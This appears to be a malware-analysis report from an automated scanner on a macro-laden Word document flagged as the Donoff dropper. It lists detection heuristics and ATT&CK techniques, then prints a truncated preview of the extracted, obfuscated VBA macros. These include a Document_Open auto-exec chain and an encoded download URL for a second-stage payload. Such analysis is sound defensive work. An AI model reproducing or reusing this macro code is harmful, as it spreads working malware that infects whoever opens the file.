MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros. The 'Document_Open' macro, along with 'CreateObject' and 'CallByName' calls, indicates an attempt to execute code upon opening. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' strongly suggests this is a dropper malware. The VBA code is heavily obfuscated, but the presence of these indicators points to a malicious dropper designed to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18353 bytes |
SHA-256: a134f23ee10b07b941b8d1f1bce4d644cddcf932374d943a91c1d43e0b99baa3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub lkswGSHNVuTAQ(ByVal omQZrkiVPngMZw As String, ByVal peoQWzJfdX As Integer)
VIfjXBzOOIOwxo True, "rLuIztlckEAe", 9044
bkgCuZoYdtPvT "brfqXBb1FG", "xXmt6cN1sdjN"
JGtAgsTnoqG
lCPTKRZExOo = 6741
If UmgYc("CubvvVU1AS", 886, 440) Then
cmmRVObVQe = 9024
ftWCW
drTbEZVgssazF 1883
miEyuzJOiITog = 3192
TYGwFzqKih "du1M2Yb8LO5"
OtEHtGvFpsmxw = "Cb753mIufhHfKj"
Else
eVotAb 653, 5024, 4694
HOoHlL "0EU7OPKnWOQBp", 9258
hxqbWrAyD
JrrWDfLp = False
End If
End Sub
Private Sub EZkcFRxnRjouTl(ByVal MuSLxrZ As Integer)
cvXQJPIOxxe "0p3GOHg9GAjBUDK", "lWCFr4ovNAL", "lUxS5dTIL"
EymBSI = 358
iDOTKcGepkOAeE
sCAHDhUqizd = "m2uYSx9r57x6CV"
If DzPrxDwcLEKWX(True, 55, True) Then
mLVGipakLwl = 4069
mWyBxJiVQ 555, "sJ3EJMvxKjvUFs", 2131
uGzOfaOdNBuW = "wXPe1c1QiWNfYg"
aBYsyTlLOxb
Else
wiXEZX
JSzAaGnyj 9355
gNLfZVRnimxxR = "3CSAuj8FKvsfJJ"
End If
End Sub
Private Sub Document_Open()
Dim fUavOXs As Integer
Dim ysvMDfdzG As Boolean
QljCDRAhYYJeK.VMrLsxqGWZhW
End Sub
Attribute VB_Name = "QljCDRAhYYJeK"
Private Sub PbzYzSnrytYs(ByVal QvhDTEOB As String, ByVal iABgsQUWuywQ As String)
AcYriFBAyXe "a6uOKc4W0jRot2"
nFuWiLofk = "AsOckSqPD99m"
MQlLJrJaJGmdyr "9mOnOm196xOk", "dulLa7Po3jozWL", True
End Sub
Private Sub wpPBaZlNg(ByVal OdhAsRdvKl As Integer, ByVal UdqvvCAKEHp As String)
qKKygiydbcpeHi 3110
FzuUMcZI = 6371
CamHpqofVQJtzq "ZvNzbYqJZJ1yO", "7O9YXtkGHRbC"
faLwgw = True
FxGyLJvXkDuXnm
End Sub
Private Sub CjzNnDnizcfDgX(ByVal fbBDpNgzD As String, ByVal yXbTmGSHZZEzUu As Boolean)
okVkXeIkJG
WspbhijATvOQnh
XoYDn
End Sub
Public Function vtJeRYrx(ByVal uNHgaheI As String, ByVal vpXcp As String) As Object
Dim QQACfBvnEL As Integer
Dim iYKQhSBvjnh As String
Set vtJeRYrx = UTgowUeRVo(CreateObject(uNHgaheI))
End Function
Public Sub VMrLsxqGWZhW()
Dim IAgTLGtVXy As String
Dim vOGRlLXd As Integer
On Error GoTo irqbbTdEaF
VWPRmiQm.ycjedji
VWPRmiQm.MCubUOGGpxO
KevtNctmqcnMPu
Exit Sub
irqbbTdEaF:
End Sub
Private Sub UJtyIdEHGgj(ByVal cynhCXtpuZ As String)
EyvlKVzYsFu = "MZzFvjMhG"
If TTaCzGlAULM Then
NqrcviW False, "1J7m64CfrsIAs"
SCSazX
OfGfjkCHRKg True
Else
DIgpVqxKez 2123
End If
DVDZuspk "omWl6LySYh", 972
End Sub
Private Function UTgowUeRVo(ByVal tNaSQ As Object) As Object
Dim YBEMFJns As Integer
Set UTgowUeRVo = tNaSQ
End Function
Private Sub EoGcJRDhX(ByVal ugUysMpMUOif As String, ByVal LWMEHeWYA As String, ByVal cjiLQGcJHG As String)
Set MUSpHmv = NPueVrFYLnjLh.ppnPuwNle(True, cjiLQGcJHG)
NPueVrFYLnjLh.WnJKbAfDLckP KeWRwAnEnFR, 2670, "8aobfhvxYQM", MUSpHmv
JCyeWXOiyKhqyn.ZfIDrxSj cagYBeiSN.BfgxxHh(ndkhuPNeKaHRXK, MUSpHmv, 8879), False, "VSl6YUeDfo", ugUysMpMUOif
End Sub
Private Sub KevtNctmqcnMPu()
Dim YUqAlGJK As Boolean
EoGcJRDhX JCyeWXOiyKhqyn.GKbsdtedofVe, "uNlQmvYTMgvpWz", EOdsVSPnuYTLt
JCyeWXOiyKhqyn.FeZivkODwFK False, 618, JCyeWXOiyKhqyn.GKbsdtedofVe
End Sub
Private Function KeWRwAnEnFR() As String
KeWRwAnEnFR = oGDphuZ.GduvfnbzJkCRA("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function ndkhuPNeKaHRXK() As String
ndkhuPNeKaHRXK = oGDphuZ.GduvfnbzJkCRA("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function EOdsVSPnuYTLt() As String
EOdsVSPnuYTLt = oGDphuZ.GduvfnbzJkCRA("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function
Attribute VB_Name = "oGDphuZ"
Private Function OabmIabiHpIOX(ByVal dWXqRYKkmZr As Integer, ByVal tsXIcBJwI As Integer, ByVal LUYteSeZzx As String, ByVal rvPMoqpvdb As String) As String
If Not kaShcLt.cKVuqwbFwPxEo(rvPMoqpvdb, False, False, LUYteSeZzx) Then
OabmIabiHpIOX = rvPMoqpvdb
End If
End Function
Private Function qCXcVwnCKhP(ByVal wJXruvwcaAXl As String) As String
wbhMqFiLIuXxUH
krKOU = False
lHIEk
qCXcVwnC
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.